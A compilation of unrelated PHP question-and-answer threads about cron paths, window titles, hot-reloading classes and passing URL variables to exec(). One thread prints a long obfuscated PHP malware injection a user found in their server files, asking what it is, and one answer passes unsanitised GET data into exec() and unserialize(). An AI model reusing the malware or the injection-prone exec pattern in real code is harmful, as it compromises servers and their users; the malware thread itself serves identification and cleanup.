PHP cron require path issue - php

I'm having an issue with PHP require (I think) and crontab. I'm using AWS.
The error looks like this:
PHP Fatal error: require(): Failed opening required '/inc/classes/core/inc.php' (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/html/inc/files/core/config.php on line 16
My PHP require looks like this:
require($_SERVER['DOCUMENT_ROOT'].'/inc/files/core/config.php');
There are similar issues here about the same thing and I looked at them, but their solutions didn't seem to work for me. One of the things I tried from Stackoverflow was this:
$_SERVER['DOCUMENT_ROOT'] = realpath(dirname(__FILE__).'/../../../../');
require($_SERVER['DOCUMENT_ROOT'].'/inc/files/core/config.php');
Another was adding this to my php ini file (also a suggestion from another thread):
include_path = ".:/usr/share/php:/var/www/<directory>/"
I also tried being direct with the path (i.e., /var/www/public/inc/etc) which didn't work.
My file dictionary is like:
public
-- inc
---- files
------ site
-------- cron
-- etc
-- etc
I should note that the requires are the same on every page and they work, except in the cron job. I read that this could be because of the $_SERVER['DOCUMENT_ROOT'] var being set by the user as they browse and can't be set by the crontab, but I can't figure out the fix.
The crontab looks like this, but it seems to send an email every 5 minutes like it's supposed to so I don't think there's any issue here.
*/5 * * * * /usr/bin/php /var/www/html/inc/files/site/cron/shop.php
I'm hoping someone has some insight on this because I'm stumped! I didn't set up any of the crontab work but the person who did left, and I'm not familiar with it.
I put in all the information here I could think of, but I'm happy to answer any additional questions.


There is no $_SERVER when running php-cli. It will return empty or null value.
$_SERVER is an array containing information such as headers, paths, and script locations. The entries in this array are created by the web server.
https://secure.php.net/manual/en/reserved.variables.server.php
Replace with a path to the file you want, assuming the path of the script you are running. This may work, but maybe you need to add or remove some of the ../
require(__DIR__ . '/../../../files/core/config.php');
The error you get points to config.php file. You probably have another $_SERVER there, that you need to replace and/or find a way to identify whether is a HTTP request or php-cli.
Something like
if($_SERVER['DOCUMENT_ROOT']) {
require($_SERVER['DOCUMENT_ROOT'] . ...);
} else {
require(__DIR__. ...);
}
You may want to add a global constant that points to the root of you project.
if($_SERVER['DOCUMENT_ROOT']) {
const BASEDIR = $_SERVER['DOCUMENT_ROOT'];
} else {
const BASEDIR = __DIR__. ...;
}
Then use BASEDIR for the entire application.
EDIT: as suggested by #YvesLeBorg, you can create a different file, that call your entry point with curl or wget.
*/5 * * * * /usr/bin/php /path/to/my_script.sh
Then in my_script.sh you can write
wget http://my_web_page/shop.php
Then you will have a $_SERVER and there is no need to refactor.
Be aware of security, as anyone can call you page and run your proccess.
You may want to use a token and validate IP Address to be sure that only you can call this shop.php page.

Related

Does somebody knows what is this code Virus in PHP?

I don't know what is, I found it inside of all PHP files on my server, I think is a kind of virus or something else?, What do you think guys?. Is already on my server, inside of each PHP file on the top of the document, and down of this code start my normal code.
I'll appreciate your help thanks!
<?php $jkpyncainc = 'ss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782g!>!#]y81]273]y76]258]%x5c%x7825yy)#}#-#%x5c%x787,*c%x5c%x7827,*b%x5cPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR_reporting(0); preg_replace("%x2f%50%x2e%52%x78:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%ftmbg}%x5c%x787f;!osvufs}wc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x787f!~!<##!>!2p%29%57%x65","%x65%166%x61%154%x28%151ftmbg!osvufs!|ftmf!~<**9.-j%x5c5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K356]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%vodujpo)##-!#~<#%x5c%x72]y74]256#<!%x5c%x7825ff2!>!b!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]87822l:!}V;3q%x5c%x7825}U;x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gx5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<39275ttfsqnpdov{h19275j{hnpd19275fub}R;msv}.;%x5c%x782f#%x5c%x782-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%87f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftm;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utp27!hmg%x5c%x7825)!gj!~<ofmy%x5c%x%x785cq%x5c%x7825%x5c%x78278y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#5t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww5c%x7824-%x5c%x7824*!|!%x56<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%xq%x5c%x7825<#g6R85,67R37,18R#>q%x5fV%x5c%x787f<*X&Z&S{ftm%x7825!<5h%x5c%x7825%x5c%x786]y81]265]y72]254]y76#<%x5c%x7825tmw!>mdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UV<#372]58y]472]37y]672]48y]#>s%x5c%x7825<%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvu#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7]88]5]48]32M3]317]445]212]445]43]32#00;quui#>.%x5c%x7825!<**yfeobz+sfwjidsb%x5c%x786R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2T7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5cx5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%xx7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825%x5c%x785c%x5c%x7825j:.2^,%x5ssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%xc%x7825b:<!%x5c%x782825>5h%x5c%x7825!<*::::::-111112)eobs%!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hI%x5c%x787fw6*%x5c%x787272qj%x5c%x7825)7gj6<**2qj%x5c%x782400~:<h%x5c%x7825_t%x5c%x7Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5x5c%x7822#)fepmqyfA>ovg}{;#)tutjyf%x5c%x7860opj86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]27udovg)!gj!|!*msv%x5c%x7825)}k~~~<x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fwf14+9**-)1%x5c%x782f293]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825%x7825hOh%x5c%x782f#00#W~!%x5c%x782%x5c%x7825%x5c%x7824-%x5c%if((function_exists("%x6f%142%x5f%163%x74%141%qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MP5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x785c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5d%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452g39*56A:>:8:|:7#6#)tutjyf%x5c%x786049386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%epn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c2f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782fj{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%5z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825EEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c24-%x5c%x7824-tusqpt)7fw6<*K)ftpmdXA6|7**197-2;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudx5c%x7825tww!>!%x5c%25h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:57860QUUI&b%x5c%x7825!|!*#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:**WYsboepn)%x5c%x7824%x78%62%x35%165%x3ac%x7825V<*#fopoV;hojepd<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]25G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55L-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gjoF.uofuopD#)sfebfI{*w%x5c%j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%7825,3,j%x5c%x7825>j%x5c%x7825!<**3-d]55#*<%x5c%x7825bG9}:}.}-}!#*<%x8]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gd%x5c%x7825)uqpuft%x5c%x7860msvd},fV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cf#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-i5kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5cW%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_S7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjy5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo2]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]2%x7825r%x5c%x7878Bsfuvso!sbo154%x69%164%50%x22%13%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pj%x5c%x7825-bubE{h%x5c%x786*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x786c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x782+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7888M4P8]37]278]225]241]3345c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>7]y72]265]y39]271]y83]256]y7%x5c%x7825!*3>?*2b%x5c%x297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51Lfs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmb2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%utRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+9)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Zw%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5x5c%x78257**^#zsfvr#%x5c%x785cq%x5cj%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5but%x5c%x7860cpV%x5c%x7I#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x82f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x56]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]25x5c%x78242178}527}88:}334}472%x5c%x7824552]e7y]#>n%x5c%x782560QUUI&c_UOFHB%x5c%x7860SFTV%x5c%xx7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%xx786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x*f%x5c%x7827,*e%x5c%x7827,*d%x5c%x782c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tv%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]2!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y7gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u78256<C%x5c%x7827pd%x5x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%K9]77]D4]82]K6]72]K9]78]Kr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", %x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x51]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#0{6:!}7;!}6;##}C;!>>0bj+upcotn+qsvmt+fmhpph#)zbssb!-x5c%x7878pmpusut)tpqss5c%x7825nfd>%x5c%x7825fdy<Cb*#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h%x5c%x7827id%x5c%x78256<%)) { $GLOBALS["%x61%156%x75%156%x61"]=1; funj6<*id%x5c%x7825)ftp7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x56~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsy3d]51]y35]274]y4:]82]y3:vufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)us>:h%x5c%x7825:<#64y]Y%x5c%x7825)fnbozcYufhA%x5c%x78272q825)!gj!<2,*j%x5c%x7825-#1]825:osvufs:~:<*9-1-r%x5c%xc%x78b%x5c%x7825mm)%x5c%x7825%x5c%x78j%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257x7825)m%x5c%x7825):fmji%x5c%x7878:<##:7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5cc%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>25)sutcvt-#w#)ldbqov>*ofmy%xf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x5bss-%x5c%x7825r%x5c%x7878B%x5c%x78)!gj+{e%x5c%x7825!os%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]ction fjfgg($n){return chr(ord($n)-1);} #error<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%xy]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)y6g]273]y76]271]y7d]252]y74]256#<!%xx72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"]))NULL); }x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA%x7825cB%x5c%x7825iN}#-!tussfw)%%x787fw6*3qj%x5c%x78257>%x5c%x782x7825!<12>j%x5c%x7825!|!*ctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!/(.*)/epreg_replacewpogvapkgq'; $tvgewvpmer = explode(chr((188-144)),'3644,46,9854,55,8686,44,9669,46,170,45,479,36,7686,60,256,63,5990,21,4650,20,6011,68,2509,40,6079,57,3860,56,5762,46,9350,70,7932,22,4956,52,9917,59,8846,47,8269,66,1517,44,7204,56,3747,48,4370,25,3690,57,2402,67,10008,33,2936,31,804,49,8994,35,9119,43,1345,49,7954,52,7031,35,4314,35,1594,27,940,48,2914,22,9258,53,1763,53,9200,58,5127,55,8730,20,1939,69,112,58,8661,25,3375,64,6162,65,8446,20,8790,56,345,43,5483,41,5182,34,1454,63,319,26,4395,52,3164,27,3342,33,515,31,9420,65,7066,61,1278,67,9029,27,6366,49,1561,33,5008,36,6136,26,9485,28,4828,70,674,44,10041,25,1230,48,8404,42,4163,64,458,21,2469,40,6590,24,5725,37,3144,20,6745,57,1873,28,4118,45,2284,25,7586,37,91,21,2195,54,2705,38,893,47,1162,68,2309,24,8466,32,3109,35,3261,41,8498,22,6886,59,4017,47,5688,37,4277,37,7437,34,4536,24,6945,49,9715,40,6440,63,8006,47,7528,58,6503,59,1024,29,5379,49,2048,47,6676,69,3981,36,988,36,5808,60,9513,37,6802,41,9585,20,8918,56,7181,23,1394,60,1850,23,5216,70,2333,69,1816,34,4670,23,4898,26,7471,57,779,25,9755,63,7876,56,5428,55,1053,58,7811,65,5911,51,7308,69,1901,38,7746,65,580,42,4447,20,2967,30,9056,26,718,61,1621,67,6265,65,9162,38,8974,20,7416,21,2008,40,4560,70,388,70,7377,39,4693,57,645,29,2632,53,1737,26,7623,63,10066,40,65,26,4349,21,3048,61,3618,26,6843,43,6330,36,5868,43,2743,65,7127,54,853,40,622,23,7260,48,1111,51,8893,25,5602,45,9976,32,5341,38,2808,42,2997,51,5962,28,4064,54,8610,51,2850,64,8078,42,3583,35,1688,49,4630,20,9550,35,4467,69,6614,62,3461,60,8053,25,546,34,2095,58,2153,42,3521,62,4750,40,5044,33,8520,29,8335,69,9605,64,6415,25,3916,65,2249,35,8202,67,0,43,3439,22,3191,70,5647,41,2549,54,4924,32,8750,40,2603,29,2685,20,3795,65,5568,34,9311,39,8162,40,6227,38,4227,50,6994,37,9082,37,215,41,8549,61,4790,38,5524,44,43,22,9818,36,3302,40,6562,28,5077,50,5286,55,8120,42,9909,8'); $bwellubqxl=substr($jkpyncainc,(42586-32480),(27-20)); if (!function_exists('mzrfqfsbfr')) { function mzrfqfsbfr($zsdakifiuq, $isfdnrujpz) { $wsvjrnzrfc = NULL; for($wzdtszvbpa=0;$wzdtszvbpa<(sizeof($zsdakifiuq)/2);$wzdtszvbpa++) { $wsvjrnzrfc .= substr($isfdnrujpz, $zsdakifiuq[($wzdtszvbpa*2)],$zsdakifiuq[($wzdtszvbpa*2)+1]); } return $wsvjrnzrfc; };} $vpzmduwprw="\x20\57\x2a\40\x67\156\x68\155\x62\156\x74\172\x6e\150\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x36\55\x31\64\x39\51\x29\54\x20\143\x68\162\x28\50\x34\62\x39\55\x33\63\x37\51\x29\54\x20\155\x7a\162\x66\161\x66\163\x62\146\x72\50\x24\164\x76\147\x65\167\x76\160\x6d\145\x72\54\x24\152\x6b\160\x79\156\x63\141\x69\156\x63\51\x29\51\x3b\40\x2f\52\x20\161\x70\150\x78\152\x6f\153\x70\157\x64\40\x2a\57\x20"; $zhcvxtttqr=substr($jkpyncainc,(47797-37684),(67-55)); $zhcvxtttqr($bwellubqxl, $vpzmduwprw, NULL); $zhcvxtttqr=$vpzmduwprw; $zhcvxtttqr=(403-282); $jkpyncainc=$zhcvxtttqr-1; ?>

this is not the answer for your question, but since its the same issue I am having (https://stackoverflow.com/questions/24881340/malware-code-being-injected-in-my-php-scripts) (And I don't have the necessary reputation points to post a comment), here's a script to scan and remove all the php files: http://pastebin.com/JgyDZj3R
Make sure to change {username} to your accounts username, create a file named yoyo.txt on the same directory as this PHP script and paste the illegal code in that file.
Its best if you have SSH access since it will take a lot of time to execute depending on how many files you have.
Hope this helps! :)

If you have SSH access to the server, and the website isn't usually modified that much, I suggest you try the following:
Log in through SSH
Navigate to the website directory
Execute the command find . -mtime -1 -type f
This will give a list of all files which have been modified in the last day. This way you can manually check them and remove the malicious code blocks.
Should the exploit have been installed earlier, you can expand your search to go further back e.g. find . -mtime -3 -type f to go back 3 days.
Do note this is just a quick fix for a single website, chances are your server has been completely compromised, in which case you either need to do a full reinstall as already stated above, or get some professional help.

Get windows title using php doesn't work on browser call

My problem is I need to fetch FOOBAR2000's title because that including information of playing file, so I create a execute file via Win32 API(GetWindowText(), EnumWindows()) and it's working good.
TCHAR SearchText[MAX_LOADSTRING] = _T("foobar2000");
BOOL CALLBACK WorkerProc(HWND hwnd, LPARAM lParam)
{
TCHAR buffer[MAX_TITLESTRING];
GetWindowText(hwnd, buffer, MAX_TITLESTRING);
if(_tcsstr(buffer, SearchText))
{
// find it output something
}
return TRUE;
}
EnumWindows(WorkerProc, NULL);
Output would look like "album artis title .... [foobar2000 v1.1.5]"
I created a php file like test.php, and use exec() to execute it.
exec("foobar.exe");
then in console(cmd) I use command to execute it
php test.php
It's working good too, same output like before.
Now I use browser(firefox) to call this php file(test.php), strange things happened.
The output only foobar2000 v1.1.5, others information gone ...
I think maybe is exec() problem? priority or some limitation, so I use C# to create a COM Object and register it, and rewrite php code
$mydll = new COM("FOOBAR_COMObject.FOOBAR_Class");
echo $mydll->GetFooBarTitle();
still same result, command line OK, but browser Fail.
My question is
Why have 2 different output between command line and browser. I can't figure it out.
How can I get correct output via browser.
or there is a easy way to fetch FOOBAR2000's title?
Does anyone have experience on this problem?
== 2012/11/28 edited ==
follow Enno's opinion, I modify http_control plug-in to add filename info, original json info is "track title".
modify as following
state.cpp line 380 add 1 line
+pb_helper1 = pfc::string_filename(pb_item_ptr->get_path());
pb_helper1x = xml_friendly_string(pb_helper1);

# 1: when firefox opens the php and it gets executed, it the context depends on the user which runs the php-container (apache), this is quite different from the commandline call which gets executed in your context
# 2 and 3: there seems to be more than one way for getting the title: use the foobar-sdk and create a module which simply reads the current title per api, then write your result in an static-html-document inside your http-root-folder OR use the http-client inside the sdk, with it, you do not need a wabserver, even better use a already implemented module: for instance foo_upnp or foo-httpcontrol
Good luck!

If your webserver runs as a service, in windows you need to enable "allow desktop interaction" for the service. Your php script runs as a child of the webserver process when requested via browser.

Is it possible to dynamically reload PHP code while script is running?

I'm having a multiplayer server that's using PHPSockets, and thus is written entirely in PHP.
Currently, whenever I'm making any changes to the PHP server-script I have to kill the script and then start it over again. This means that any users online is disconnected (normally not a problem because there aren't so many at the moment).
Now I am rewriting the server-script to use custom PHP classes and sorten things up a little bit (you don't want to know how nasty it looks today). Today I was thinking: "Shouldn't it be possible to make changes to the php source without having to restart the whole script?".
For example, I'm planning on having a main.php file that is including user.php which contains the class MyUser and game.php which contains the class MyGame. Now let's say that I would like to make a change to user.php and "reload" the server so that the changes to user.php goes into effect, without disconnecting any online users?
I tried to find other questions that answered this, the closest I got is this question: Modifying a running script and having it reload without killing it (php) , which however doesn't seem to solve the disconnection of online users.
UPDATE
My own solutions to this were:
At special occations, include the file external.php, which can access a few variables and use them however it'd like. When doing this, I had to make sure that there were no errors in the code as the whole server would crash if I tried accessing a method that did not exist.
Rewrite the whole thing to Java, which gave me the possibility of adding a plugin system using dynamic class reloading. Works like a charm. Bye bye PHP.

Shouldn't it be possible to make changes to the php source without having to restart the whole script?
[...]
I'm planning on having a main.php file that is including user.php
which contains the class MyUser
In your case, you can't. Classes can only be defined once within a running script. You would need to restart the script to have those classes redefined.

I am not too familiar with PHP but I would assume that a process is created to run the script, in doing so it copies the instructions needed to run the program and begins execution on the CPU, during this, if you were to "update" the instructions, you'd need to kill the process ultimate and restart it. Includes are a fancy way of linking your classes and files together but ultimately the processor will have that information separate from where the file of them are stored and it is ultimately different until you restart the process.
I do not know of any system in which you can create code and actively edit it and see the changes while that code is being run. Most active programs require restart to reload new source code.

Runkit will allow you to add, remove, and redefine methods (among other things) at runtime. While you cannot change the defined properties of a class or its existing instances, it would allow you to change the behavior of those objects.
I don't recommend this as a permanent solution, but it might be useful during development. Eventually you'll want to store the game state to files, a database, Memcache, etc.

How about storing your User object into APC cache while your main script loads from the cache and checks every so often for new opcode.
To include a function in the cache, you must include the SuperClosure Class. An example would be:
if (!apc_exists('area')) {
// simple closure
// calculates area given length and width
$area = new SuperClosure(
function($length, $width) {
return $length * $width;
}
);
apc_store('area', $area);
echo 'Added closure to cache.';
} else {
$func = apc_fetch('area');
echo 'Retrieved closure from cache. ';
echo 'The area of a 6x5 polygon is: ' . $func(6,5);
}
See here for a tutorial on APC.

Simple solution use $MyUser instead of MyUser
require MyUserV1.php;
$MyUser = 'MyUserV1';
$oldUser = new $MyUser('your name');
//Some time after
require MyUserV2.php;
$MyUser = 'MyUserV2';
$newUser = new $MyUser('your name');
Every declared class stay in memory but become unused when the last MyUserV1 logout
you can make them inherit from an abstract class MyUser for using is_a

You cannot include again a file with the same class, but you can do so with an array. You can also convert from array to class, if you really need to do so. This only applies to data, though, not to behavior (methods).

I don't know much about these things with the games on PC but you can try to get all the variables from your database for the user and then update the text fields or buttons using those variables
In web is using AJAX (change data without refreshing the page).Isn't one for programming?

passing URL variables to exec() with php

I have a dedicated server that I use to crunch lots of data. The way I have it now, I can open a script with a process ID like example.php?ex_pid=123 and just let it go. It downloads a small portion of data, processes it, then uploads it into a database then starts again.
Ideally, I would like to call example.php?ex_pid=123 directly and not by passing a variable to example.php like exec('./example.php'.' '.EscapeShellArg($variable)); to keep it from acting globally.
I don't care about the output, if it could execute in the background, that would be brilliant. The server is an Ubuntu distribution btw.
Is this even possible? If so, any help and examples would be more then appreciated.

You could do something like:
exec("./example.php '".addslashes(serialize($_GET))."');
And then in example.php do something like this:
count($_GET) == 0 && $_GET = unserialize(stripslashes($_SERVER['argv'][1]))

The main issue with that is that ?ex_pid is GET data which is generally associated with either including the file or accessing it through a browser. If you were including the file or accessing it from a web browser this would be trivial, but running it as CLI, your only option would be to pass it as an argument, unfortunately. You can pass it as ex_pid=123 and just parse that data, but it would still need to be passed as an argument but doing that you could use parse_str() to parse it.
Depending on what the script does, you could call lynx to call the actual page with the get data attached and generate a hash for an apikey required to make it run. Not sure if that is an option, but it is another way to do it how you want.
Hope that helps!

I had a real problem with this and couldn't get it to work running something like example.php?variable=1.
